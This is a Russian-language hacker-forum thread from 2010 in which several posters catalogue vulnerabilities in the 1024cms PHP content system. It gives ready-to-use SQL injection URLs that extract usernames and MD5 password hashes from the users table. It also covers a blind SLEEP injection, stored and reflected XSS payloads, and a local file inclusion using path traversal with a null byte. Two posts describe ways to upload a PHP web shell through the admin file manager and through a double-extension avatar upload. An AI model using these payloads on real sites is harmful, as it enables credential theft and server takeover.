Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   1024cms (https://forum.antichat.xyz/showthread.php?t=186573)

Root-access 13.03.2010 21:20
1024cms
 
Сайт: www.1024cms.org
Префикс таблиц по умолчанию: otatf_
Алгоритм хеширования: md5($pass)
SQLi
Движок просто кишит инъекциями и другими уязвимостями. Кстати, он отказывается работать при register_globals=on, это видимо у них предосторожность такая...) Поскольку в противном случае число уязвимостей удвоится.
В модуле форума:
Код:
http://localhost/1024/index.php?p=viewforum&id=1'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((select+password+from+otatf_users+limit+0,1),floor(rand(0)*2)))--+
Уязвимая строчка в 1024\pages\viewforum\default\content.php:
PHP код:
...
$get_cat_type mysql_query("SELECT * FROM ".$prefix."subcats WHERE id='".$id."'") or die("Cannot get category type: ".mysql_error());
... 
В RSS: //Плин, теперь нагуглил, что бага старая, но пусть будет
Код:
http://localhost/1024/rss.php?t=vp&id=1'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((select+password+from+otatf_users+limit+0,1),floor(rand(0)*2)))--+
Уязвимый участок \1024\rss.php:
PHP код:
...
else if ($_GET['t'] == "vp") { 
    $topic_id $_GET['id']; 
     
    //Start RSS vars 
    $items = array(); 
    $channel = array(); 
     
    //Get topic 
    $get_tp mysql_query("SELECT t.uid AS t_uid, t.title AS t_title, t.content AS t_content, t.date AS t_date, f.id AS f_id, f.name AS f_name, f.description AS f_descrip FROM ".$prefix."topics t, ".$prefix."subcats f WHERE t.id='".$topic_id."' AND f.id=t.tid") or die("Cannot get TP: ".mysql_error());
... 
В различных служебных скриптах: //таких инъекций в этом движке, похоже, тучи, как и подобных скриптов
Код:
http://localhost/1024/pages/download/admin/ajax/sub/edit_sub_it.php?cat='+union+select+1,concat(username,0x3b,password)+from+otatf_users--+
Эта скуль очень приятная, запрос выполняется по циклу и выводятся все поля в теге <option>.
Уязвимый код в \1024\pages\download\admin\ajax\sub\edit_sub_it.ph p:
PHP код:
...
$get_cats = mysql_query("SELECT id, name FROM ".$prefix."downloadsub WHERE category='".$_GET['cat']."' ORDER BY weight ASC") or die("Cannot get cats: ".mysql_error());
...
<option value="<?php echo $cat['id']; ?>"><?php echo clean_smart($cat['name']); ?></option>
...
Код:
http://localhost/1024/pages/download/admin/ajax/sub/weight_sub.php?cat='+union+select+1,concat(username,0x3b,password),3+from+otatf_users--+
Такая же приятная скуль, выдаёт красивый список.
Уязвимый код в \1024\pages\download\admin\ajax\sub\weight_sub.php:
PHP код:
...
<?php 
$get_cat mysql_query("SELECT id, name, weight FROM ".$prefix."downloadsub WHERE category='".$_GET['cat']."' ORDER BY weight ASC") or die("Cannot get forums: ".mysql_error()); 
while($cat mysql_fetch_array($get_cat)) { 
?> 
    <li id="d_<?php echo $cat['id']; ?>"><?php echo $cat['name']; ?></li> 
<?php ?>
...
Код:
http://localhost/1024/pages/download/admin/ajax/sub/edit_sub_do.php?name=1&type=1&descrip&id=1'+and+sleep(10)--+
Что-то в этой инъекции в UPDATE у меня вывод не получился, туплю где-то, можно перебором ломать, например, со SLEEP().
Уязвимый код в \1024\pages\download\admin\ajax\sub\edit_sub_do.ph p:
PHP код:
...
mysql_query("UPDATE ".$prefix."downloadsub SET category='".$_GET['cat']."', name='".quote_smart($_GET['name'])."', description='".quote_smart($desc)."' WHERE id='".$_GET['id']."'")
... 
Кстати у них в этих админских скриптах весьма оригинальная защита от доступа несанкционированного:
PHP код:
if($_SESSION['type'] !== '1' || $_GET['type'] !== '1') die("Incorrect Session"); 
Такая строчка там встречается очень часто, о чём думали разрабы, я не знаю.
CE
В админке есть разные варианты заливки шелла, например, через файловый менеджер:
Код:
http://localhost/1024/admin/index.php?op=files

Welemir 21.03.2010 03:04
Код:


echo "<br /><div align='center'><div class='plain_tables' style='width:90%; text-align:center'>".$_GET['confir']."</div></div>";

Пассивная XSS В скрипте pages\cinema\ajax :(.Чет заблудился в коде я...).Переменная вообще не фильтруется.

ЗЫ: Рядом,кстати,красивый апдейтик в базу происходит...И длина строки передаваемой не фильтруется(а надо оно или нет не знаю).Можно забить базу чем-нибудь...Получится из этого что-нибудь ?) длина поля int(11)))) (выходит 44 байта максимум - 11 * 4)

ЗЫЗЫ: всё-таки последнее - имхо глупость)

Welemir 21.03.2010 04:54
Забавную вещь нашёл в чате:).Не знаю,даже,как назвать - двойная xss,активная+пассивная,в общем,бред)):

http://localhost/1024/index.php?p=pm&t=send&u=

Вбиваем что-нибудь в поле Recipient(необязательно) и лицезреем всё увеличивающиеся куски хтмл кода.В поле Message получаем XSS при ставновлении окна активным )

Сдаётся мне,дело в этом:

PHP код:

<?php } if(isset($_GET['u']) && $_GET['u'] !== "") { ?>
<script type="text/javascript">
    setTimeout("givemeausername()", 1000);
    function givemeausername() {
        document.getElementById('autocomplete').value = "<?php echo $_GET['u']; ?>";
    }
setTimeout - функция ака таймер(или как системный таймер в NET),а задача любого такого таймера - выполнять процедуру в заданный промежуток времени ).Вот,она и выполняется - значению элемента с id autocomplete присваивается значение - как раз то,что мы передадим в GET переменной.В общем,весело :).Всякий знает,что javascript можно менять на стороне клиента(жалею,что нету инструментов).Думаю,будет весело увидеть это со скоростью 10 мс ))))).


Код будет как раз в исходниках:

Код:

<script type="text/javascript">
        setTimeout("givemeausername()", 1000);
        function givemeausername() {
                document.getElementById('autocomplete').value = "ТУТ";
        }
</script>

Ctacok 22.03.2010 21:55
Активка:

Цитата:
/index.php?p=avatars&op=save&aid="><script>alert(); </script>&ses_token=ну ваш ses_token,
Потом в профайле срабатывает.

LFI:

Под админом надо быть.
Цитата:
/admin/index.php?op=../../../robots.txt%00

PHP код:
if(!isset($_GET['op']) || trim($_GET['op']) == ""$page "home";
else $page $_GET['op'];

strtolower($page);

if(isset($_SESSION['admin']) || $page == 'login') {
    define("_AJAX_INCLUDE_""./ops/".$page."/ajax/ajax.js");
    include("./lang/".$lang."/".$page."/default.php"); 
Много искать не стал, на этом остановился

Welemir 22.03.2010 23:51
Пассивная XSS
Скрипт: /admin/index.php

Участок кода:

PHP код:

if(isset($_SESSION['admin']) || $page == 'login') {
    define("_AJAX_INCLUDE_""./ops/".$page."/ajax/ajax.js");
    include("./lang/".$lang."/".$page."/default.php");
    include("../includes/header.php"); 
    include("./themes/".$admin_theme_dir."/templates/header.tpl");
    include("./ops/".$page."/default.php");
    include("./themes/".$admin_theme_dir."/templates/footer.tpl");
} [SIZE=2][COLOR=Red]else echo "<META http-equiv='refresh' content='0; URL=index.php?op=login&amp;f=".urlencode($_SERVER['REQUEST_URI'])."'>"[/COLOR];[/SIZE
Заливка шелла через аватары:

Скрипт:
PHP код:
http://localhost/1024/admin/index.php?op=avatars 
Необходимо только сменить расширение файла на extension.evil ,где evil - расширение шелла,а extension - расширение файла,например,test.gif.php

Warning: В некоторых местах аплоада пофиксено,но там есть XSS ).

P.S.: Необходимы права админа.
ЗЫ: Аватары хранятся в папке /images/avatars/ директории /1024

Остальное в пути ).За кривое оформление заранее извиняюсь,ибо не умею.


Вот вся функция upload(),которая взаимодействует со скриптом аплоада аватара,кому интересно:

PHP код:

function upload() {
    global $admin_theme_dir;
    if(!isset($_FILES['upload']) || trim($_FILES['upload']['tmp_name']) == "") echo "<meta http-equiv='refresh' content='0;URL=index.php?op=avatars'>";
    else {
        echo "<div align='center'>";
        include("../includes/classes/uploading.php");
        $upload $_FILES['upload'];
        $tmp_name $_FILES['upload']['tmp_name'];
        $name $_FILES['upload']['name'];
        $filepath "";
        if(is_uploaded_file($tmp_name)) {
            if($_FILES['upload']['error'] == UPLOAD_ERR_OK) {
                $path "../images/avatars/";
                if(!is_dir($path)) die("Cannot find path: ".$path);
                if(preg_match('(\.gif|\.png|\.jpg|\.jpeg)'$name)) {
                    $name $_FILES['upload']['name'];
                    $filepath $path.$name;
                    if(file_exists($filepath)) die("Avatar already exists, rename the image and try again");
                    if(move_uploaded_file($tmp_name$filepath)) {
                        define("_REDIRECT_""./index.php?op=avatars");
                        define("_CONTENT_"_CONFIRMED_);
                        include("./themes/".$admin_theme_dir."/templates/successfulprocess.tpl");
                    } else die("Cannot upload file, please try again");
                } else die("File Type not allowed. You can upload: .gif, .png, .jpg, .jpeg");
            } else echo "ERROR:".file_error_check($_FILES['upload']['error']);
        } else die("Error uploading file");
    }
    echo "</div>";


Welemir 23.03.2010 00:53
Sql injection

Скрипт:
PHP код:
http://1024/admin/ops/email/default.php 

Обиженный параметр: id.Буквально в каждой функции(add,reply и т.д.).Наверное,это объясняется тем,что фильтрация там не нужна...в плане того,что админ акками никто не бросается ).




Активная XSS

Не помню,в каком скрипте,где-то на индексной странице скрипта /admin/index.php

Прописывать код там,где выводится надпись по умолчанию: Sorry our site is currently offline for maintenance


Время: 02:29